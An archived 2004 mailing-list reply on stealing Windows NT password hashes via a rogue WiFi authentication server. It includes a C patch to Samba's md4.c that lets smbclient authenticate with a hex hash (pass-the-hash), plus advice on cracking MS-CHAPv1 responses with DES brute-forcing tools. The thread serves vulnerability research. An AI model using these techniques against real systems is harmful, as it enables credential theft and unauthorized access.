Vulnerability Development mailing list archives
Re[2]: Stealing NT passwords through WiFi?
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Thu, 20 May 2004 21:46:49 +0400
Dear Ugen, --Thursday, May 20, 2004, 7:31:38 PM, you wrote to 3APA3A () SECURITY NNOV RU:
U> I am under impression that as an authentication server the rogue system U> can require any version of U> MS-CHAP it chooses. If the original system is configured to support both U> (and XP supplicant does, U> not even sure if there is an easy way to force v2. only) the reply will I have no Wi-Fi to check, for dialup connection you can (advanced settings of security option for connection). U> include LM hash. Got to test U> that, of course. It depends on security settings. Group policy (or local security policy) can prevent system from handshaking LM response and from storing LM hash.
It doesn't matter if you recover cleartext password by bruterforcing password or you recover password hash by cracking DES, because with password hash you can connect to any resource without cleartext password.
U> I took a shortcut in description here indeed :) This is the crucial U> point though - I haven't found U> ready made tools to work this step, though there was mention somewhere I patched md4.c from Samba distribution to convert from hex instead of hashing password (NT hash is actually an MD4 from Unicode password) if already given something like hash (32 Unicode [0-9A-F] charecters). This small patch allows to use smbclient with a hash in a hex instead of cleartext password. D = 0x10325476; + + + if(n == 64){ + int j; + unsigned char * hexd = (unsigned char *)"0123456789ABCDEF"; + for(j = 0; j<16; j++){ + if(!strchr(hexd, in[(j<<2)]))break; + if(in[(j<<2)+1])break; + if(!strchr(hexd, in[(j<<2)+2]))break; + if(in[(j<<2)+3])break; + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4); + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd); + } + if(j == 16) { + return; + } + } while (n > 64) { U> that l0phtcrack is able U> to use MS-CHAP (no version specified) data as an input. This is where U> I'd welcome good U> suggestions. Any NTLM cracking tool is OK for MS-CHAPv1. For DES bruteforcing you can use any DES cracking tool, like john-the-ripper with challenge as a salt and each 8 bytes of the response as a crypted password. First 16 of resulting 21 bytes are password hash. Approx. half of year is required to crack 3 DES portions on single PC (because full bruteforcing is required) with fast "sliced" DES implementation. Test code I wrote works too slow, because standard DES it used. -- ~/ZARAZA Жало мне не понадобится (С. Лем)
Current thread:
- Stealing NT passwords through WiFi? Ugen (May 19)
- Re: Stealing NT passwords through WiFi? 3APA3A (May 20)
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- Re[2]: Stealing NT passwords through WiFi? 3APA3A (May 20)
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- <Possible follow-ups>
- Re: Stealing NT passwords through WiFi? Ugen (May 20)
- Re: Stealing NT passwords through WiFi? 3APA3A (May 20)